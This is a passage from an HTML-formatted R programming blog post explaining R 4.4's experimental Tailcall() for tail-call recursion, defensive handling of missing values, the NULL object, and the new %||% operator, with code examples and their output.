&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But the call-stack gets too large and the function fails when we attempt
to use too many iterations. Note that R raises an error about the size of
the call-stack before we actually reach its limit, so the R process can
continue after exploding the call-stack.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, max_iter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Error: C stack usage 7969652 is too close to the limit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In R 4.4, we are getting (experimental) support for &lt;a href="https://en.wikipedia.org/wiki/Tail_call" rel="external"&gt;tail-call
recursion&lt;/a&gt;. This allows us (in
many situations) to write recursive functions that won’t explode the
size of the call stack.&lt;/p&gt;
&lt;p&gt;How can that work? In our &lt;code&gt;bisect()&lt;/code&gt; example, we still need to make 11
calls to &lt;code&gt;bisect()&lt;/code&gt; to get a result that is close enough to zero, and
those 11 calls will still need to be put on the call-stack.&lt;/p&gt;
&lt;p&gt;Remember the first call to &lt;code&gt;bisect()&lt;/code&gt;? It called &lt;code&gt;bisect()&lt;/code&gt; as the very
last statement in its function body. So the value returned by the
second call to &lt;code&gt;bisect()&lt;/code&gt; was returned to the user without modification
by the first call. That means we could return the second call’s value directly
to the user, instead of returning it via the first &lt;code&gt;bisect()&lt;/code&gt; call;
indeed, we could remove the first call to &lt;code&gt;bisect()&lt;/code&gt; from the call stack
and put the second call in its place. This would prevent the call stack
from expanding with recursive calls.&lt;/p&gt;
&lt;p&gt;The key to this (in R) is to use the new &lt;code&gt;Tailcall()&lt;/code&gt; function. That
tells R “you can remove me from the call stack, and put this call on
instead”. Our final line in &lt;code&gt;bisect()&lt;/code&gt; should look like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;bisect &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt; snip &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Tailcall&lt;/span&gt;(bisect, f, new_interval, tolerance, iteration &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, verbose)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that you are passing the name of the recursively-called function
into &lt;code&gt;Tailcall()&lt;/code&gt;, rather than a call to that function (&lt;code&gt;bisect&lt;/code&gt; rather
than &lt;code&gt;bisect(...)&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;To illustrate that the stack no longer blows up when tail-call recursion
is used, let’s rewrite our &lt;code&gt;blow_up()&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 4.4.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;blow_up &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(n, max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; max_iter) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Finished!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;Tailcall&lt;/span&gt;(blow_up, n&lt;span style="color:#a5d6ff"&gt;+1&lt;/span&gt;, max_iter)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can still successfully use a small number of iterations:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;But now, even a million iterations of the recursive function can be
performed:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;blow_up&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Finished!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the tail-call optimisation only works here because the
recursive call was made as the very last step in the function body. If
your function needs to modify the value after the recursive call, you
may not be able to use &lt;code&gt;Tailcall()&lt;/code&gt;.&lt;/p&gt;
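&lt;p&gt;One common workaround is to carry the partial result along as an extra
argument, so that nothing is left to do after the recursive call. The
sketch below illustrates this with a factorial. The function names and the
&lt;code&gt;acc&lt;/code&gt; argument are made up for illustration, and &lt;code&gt;fact_acc()&lt;/code&gt; can only be
called in R 4.4.0 or later:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Not a tail call: the result of the recursive call is multiplied by n
# afterwards, so this call has to stay on the call stack
fact = function(n) {
  if (n &amp;lt;= 1) {
    return(1)
  }
  n * fact(n - 1)
}

# Tail-call version (R 4.4.0 or later): the running product is carried
# along in acc, so nothing is left to do after the recursive call
fact_acc = function(n, acc = 1) {
  force(acc)  # evaluate now, so unevaluated arguments do not pile up
  if (n &amp;lt;= 1) {
    return(acc)
  }
  Tailcall(fact_acc, n - 1, acc * n)
}

fact(5)
#&amp;gt; [1] 120
fact_acc(5)
#&amp;gt; [1] 120
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;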
&lt;h3 id="rejecting-the-null"&gt;Rejecting the NULL&lt;/h3&gt;
&lt;p&gt;Missing values are everywhere.&lt;/p&gt;
&lt;p&gt;In a typical dataset you might have missing values encoded as &lt;code&gt;NA&lt;/code&gt; (if
you’re lucky) and invalid numbers encoded as &lt;code&gt;NaN&lt;/code&gt;. You might have
implicitly missing rows (for example, a specific date missing from a
time series) or factor levels that aren’t present in your table. You
might even have empty vectors, or data-frames with no rows, to contend
with. When you write functions and data-science workflows whose input
data may change over time, programming defensively and handling these
kinds of edge-cases means your code will throw up fewer surprises in the long
run. You don’t want a critical report to fail because a mathematical
function you wrote couldn’t handle a missing value.&lt;/p&gt;
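&lt;p&gt;As a small sketch of what that defensive style can look like, here is a
mean that copes with &lt;code&gt;NA&lt;/code&gt;, &lt;code&gt;NaN&lt;/code&gt; and empty input. The function name
&lt;code&gt;safe_mean()&lt;/code&gt; and the choice to return &lt;code&gt;NA&lt;/code&gt; when nothing usable is left
are assumptions made for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: a mean that tolerates missing and empty input
safe_mean = function(x) {
  # is.na() is TRUE for both NA and NaN, so this drops both
  x = x[!is.na(x)]
  # Nothing usable left: return a missing value instead of NaN
  if (length(x) == 0) {
    return(NA_real_)
  }
  mean(x)
}

safe_mean(c(1, NA, 3))
#&amp;gt; [1] 2
safe_mean(numeric(0))
#&amp;gt; [1] NA
safe_mean(c(NA, NaN))
#&amp;gt; [1] NA
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;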
&lt;p&gt;When programming defensively with R, there is another important form of
missingness to be cautious of …&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://stat.ethz.ch/R-manual/R-devel/library/base/html/NULL.html" rel="external"&gt;&lt;code&gt;NULL&lt;/code&gt;
object&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;NULL&lt;/code&gt; is an actual object. You can assign it to a variable, combine it
with other values, index into it, pass it into (and return it from) a
function. You can also test whether a value is &lt;code&gt;NULL&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Assignment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Indexing, combining and use in functions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_null[1]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;123&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] 123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;toupper&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; character(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Testing NULL-ness&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(my_null)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;identical&lt;/span&gt;(my_null, &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Note that the equality operator shouldn&amp;#39;t be used to&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# test NULL-ness:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; logical(0)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R functions that are solely called for their side-effects (&lt;code&gt;write.csv()&lt;/code&gt;
or &lt;code&gt;message()&lt;/code&gt;, for example) often return a &lt;code&gt;NULL&lt;/code&gt; value. Other
functions may return &lt;code&gt;NULL&lt;/code&gt; as a valid value - one intended for
subsequent use. For example, list-indexing (which is a function call,
under the surface) will return &lt;code&gt;NULL&lt;/code&gt; if you attempt to access an
undefined value:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(user &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Russ&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# When the index is present, the associated value is returned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;Russ&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# But when the index is absent, a `NULL` is returned&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Similarly, you can end up with a &lt;code&gt;NULL&lt;/code&gt; output from an incomplete stack
of &lt;code&gt;if&lt;/code&gt; / &lt;code&gt;else&lt;/code&gt; clauses:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;language &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Polish&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (language &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;English&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (language &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hawaiian&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Aloha&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;greeting
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; NULL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A common use for &lt;code&gt;NULL&lt;/code&gt; is as a default argument in a function
signature. A &lt;code&gt;NULL&lt;/code&gt; default is often used for parameters that aren’t
critical to function evaluation. For example, the function signature for
&lt;code&gt;matrix()&lt;/code&gt; is as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, ncol &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, byrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;, dimnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;dimnames&lt;/code&gt; parameter isn’t really needed to create a &lt;code&gt;matrix&lt;/code&gt;, but
when a non-&lt;code&gt;NULL&lt;/code&gt; value for &lt;code&gt;dimnames&lt;/code&gt; is provided, the values are used
to label the row and column names of the created &lt;code&gt;matrix&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [,1] [,2]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1,] 1 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [2,] 2 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;matrix&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, nrow &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, dimnames &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2023&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2024&amp;#34;&lt;/span&gt;), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jan&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Feb&amp;#34;&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Jan Feb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2023 1 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2024 2 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;R 4.4 introduces the &lt;code&gt;%||%&lt;/code&gt; operator to help when handling variables
that are potentially &lt;code&gt;NULL&lt;/code&gt;. When working with variables that could be
&lt;code&gt;NULL&lt;/code&gt;, you might have written code like this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Remember there is no &amp;#39;url&amp;#39; field in our `config` list&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Set a default value for the &amp;#39;url&amp;#39; if one isn&amp;#39;t defined in&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# the config&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.jumpingrivers.com/blog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;} &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; config&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;url
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_url
